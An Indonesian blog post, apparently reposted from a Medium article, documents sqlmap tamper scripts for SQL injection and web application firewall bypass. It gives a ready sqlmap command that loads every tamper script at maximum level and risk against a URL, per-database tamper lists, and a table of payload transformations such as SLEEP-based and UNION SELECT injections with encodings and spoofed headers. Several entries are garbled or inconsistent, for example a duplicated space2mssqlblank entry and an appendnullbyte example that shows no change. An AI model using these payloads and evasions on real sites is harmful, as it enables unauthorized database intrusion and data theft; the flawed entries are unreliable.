SQLMap Tamper Scripts (SQL Injection and WAF bypass)

Daftar Isi [Tutup]
    Hello sobat pixel pada kesempatan kali ini gue mau kasih sedikit penjelasan tentang SQLMap Tamper Scripts (SQL Injection and WAF bypass), Kalian tahu? Didalam tools sqlmap terdapat sebuah script (Tamper Script) script tersebut berbeda-beda fungsi, dan salah satu fungsi ialah Bypassing WAF (Web Application Firewall), and then buat kalian yang belum punya SQLMap mungkin kalian bisa lihat di postingan saya sebelumnya. Langsung aja yuk simak gimana cara memakai script tamper nya.

    Use and load all tamper scripts to evade filters and WAF 
    [email protected]:$ sqlmap.py --url "http://www.pixel-code.ga/news.php?id=3 --level=5 --risk=3 --v 3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

    Dibawah ini mungkin bisa menjadi referensi untuk pengujian tamper script pada DBMS tertentu

    General Tamper Scripts
    tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

    MSSQL
    tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

    MySQL
    tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

    Mungkin bagi yang belum tahu penjelasannya apasih yang ada pada tamper script yuk simak kak
    List of explanation Tamper Scripts SQLMap

    apostrophemask
    Function: Encoding quotation marks with utf8
    Platform: All
    Example:
    1 AND ‘1’=’1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

    apostrophenullencode
    Function: ‘ ==> %27
    Platform: All
    Example:
    1 AND ‘1’=’1 ==> 1 AND %271%27=%271

    appendnullbyte
    Function: Space ==>
    Platform: Microsoft Access
    Example:
    1 AND 1=1 ==> 1 AND 1=1

    base64encode
    Function: base64 encode
    Platform: All
    Example:
    1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw==

    between
    Function: > ==> NOT BETWEEN 0 AND
    Platform: Mssql2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    Example:
    1 AND A > B — ==> 1 AND A NOT BETWEEN 0 AND B — ```、```1 AND A = B — ==> 1 AND A BETWEEN B AND B —

    bluecoat
    Function: Space ==> %09
    Platform: MySQL 5.1, SGOS
    Example:
    SELECT id FROM users WHERE id = 1 ==> SELECT%09id FROM%09users WHERE%09id LIKE 1

    chardoubleencode
    Function: Double url encoding
    Platform: All
    Example:
    SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

    charencode
    Function: url encoding
    Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    Example:
    SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

    charunicodeencode
    Function: escape code
    Platform: Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/ASP.NET
    Example:
    SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

    commalesslimit
    Function: limit 2,3 ==> LIMIT 3 OFFSET 2
    Platform: MySQL 5.0 and 5.5
    Example:
    LIMIT 2, 3 ==> LIMIT 3 OFFSET 2

    commalessmid
    Function: MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)
    Platform: MySQL 5.0 and 5.5
    Example:
    MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)

    concat2concatws
    Function: CONCAT() ==> CONCAT_WS()
    Platform: MySQL 5.0
    Example:
    CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)

    equaltolike
    Function: = ==> like
    Platform: Mssql 2005、MySQL 4, 5.0 and 5.5
    Example:
    SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1

    escapequotes
    Function: ‘ ==> \‘、” ==> \“
    Platform: All
    Example:
    1" AND SLEEP(5)# ==> 1\\\\” AND SLEEP(5)#

    greatest
    Function: > ==> GREATEST
    Platform: MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    Example:
    1 AND A > B ==> 1 AND GREATEST(A,B+1)=A

    halfversionedmorekeywords
    Function: Space ==> /*!0
    Platform: MySQL 4.0.18, 5.0.22
    Example:
    union ==> /*!0union

    ifnull2ifisnull
    Function: IFNULL(A, B) ==> IF(ISNULL(A), B, A)
    Platform: MySQL 5.0 and 5.5
    Example:
    IFNULL(1, 2) ==> IF(ISNULL(1),2,1)

    informationschemacomment
    Function: Space ==> /**/
    Platform: MySQL
    Example:
    SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES

    lowercase
    Function: INSERT ==> insert
    Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    Example:
    SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables

    modsecurityversioned
    Function: AND ==> /!12345AND/
    Platform: MySQL 5.0
    Example:
    1 AND 2>1 — ==> 1 /*!30874AND 2>1*/ —

    multiplespaces
    Function: Space==> Multiple spaces
    Platform: All
    Example:
    1 UNION SELECT foobar ==> 1 UNION SELECT foobar

    nonrecursivereplacement
    Function: union ==> uniunionon
    Platform: All
    Example:
    1 UNION SELECT 2 — ==> 1 UNION SELESELECTCT 2-

    overlongutf8
    Function: unicode encoding
    Platform: All
    Example:
    SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1

    percentage
    Function: select ==> s%e%l%e%c%t
    Platform: Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0
    Example:
    SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

    randomcase
    Function: INSERT ==> INseRt
    Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    Example:
    INSERT ==> InseRt

    randomcomments
    Function: INSERT ==> I/**/N/**/SERT
    Platform: Mysql
    Example:
    INSERT ==> I / ** / N / ** / SERT

    securesphere
    Function: 1 AND 1=1 ==> 1 AND 1=1 and ‘0having’=’0having’
    Platform: All
    Example:
    1 AND 1=1 ==> 1 AND 1=1 and ‘0having’=’0having’

    sp_password
    Function: Space ==> sp_password
    Platform: Mssql
    Example:
    1 AND 9227=9227 — ==> 1 AND 9227=9227 — sp_password

    space2comment
    Function: Space ==> /**/
    Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    Example:
    SELECT id FROM users ==> SELECT/**/id/**/FROM/**/users

    space2dash
    Function: Space==> -nVNaVoPYeva% 0A
    Platform:MSSQL、SQLite
    Example:
    1 AND 9227=9227 ==> 1 — nVNaVoPYeva%0AAND — ngNvzqu%0A9227=9227

    space2hash
    Function: Space ==> %23nVNaVoPYeva%0A
    Platform: MySQL 4.0, 5.0
    Example:
    1 AND 9227=9227 ==> 1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227

    space2morehash
    Function: Space ==> %23ngNvzqu%0A
    Platform: MySQL 5.1.41
    Example:
    1 AND 9227=9227 ==> 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

    space2mssqlblank
    Function: Space ==> %0E
    Platform: Mssql 2000,2005
    Example:
    SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users

    space2mssqlblank
    Function: Space ==> %23%0A
    Platform: Mssql、Mysql
    Example:
    1 AND 1=1 ==> 1%23%0AAND%23%0A9227=9227

    space2mysqlblank
    Function: Space ==> %2B, %0D, %0C
    Platform: Mysql5.1
    Example:
    SELECT id FROM users ==> SELECT%0Bid%0DFROM%0Cusers

    space2mysqldash
    Function: Space==> –%0A
    Platform: Mssql、Mysql
    Example:
    1 AND 9227=9227 ==> 1 — %0AAND — %0A9227=9227

    space2plus
    Function: Space ==> +
    Platform: All
    Example:
    SELECT id FROM users ==> SELECT+id+FROM+users

    space2randomblank
    Function: Space ==> %0D, %0A, %0C, %09
    Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    Example:
    SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers

    symboliclogical
    Function: and ==> %26%26
    Platform: All
    Example:
    1 AND ‘1’=’1 ==> 1 %26%26 ‘1’=’1

    unionalltounion
    Function: Replace All is empty
    Platform: All
    Example:
    -1 UNION ALL SELECT ==> -1 UNION SELECT

    unmagicquotes
    Function: ‘ ==> %df%27
    Platform: Mysql magic_quotes/addslashes
    Example:
    1' AND 1=1 ==> 1%bf%27 —

    uppercase
    Function: Lower case to upper case
    Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
    Example:
    insert ==> INSERT

    varnish
    Function: header
    Example:
    X-originating-IP: 127.0.0.1

    versionedkeywords
    Function: union ==> /!union/
    Platform: MySQL 4.0.18, 5.1.56, 5.5.11
    Example:
    1 union select user() ==> 1/*!UNION*//*!SELECT*/user()

    xforwardedfor
    Function: X-Forwarded-For Random Head
    Platform: All
    Example:
    X-Forwarded-For: 127.0.0.1

    Gimana? cukup mudah dipahami dan dipraktekan bukan? Oiya prakteknya juga gunakan pada hal2 yang baik ya hehe, Oke mungkin cukup sekian, Dont forget too share and see you next time~

    Source :
    https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

    0 Response to "SQLMap Tamper Scripts (SQL Injection and WAF bypass)"

    Post a Comment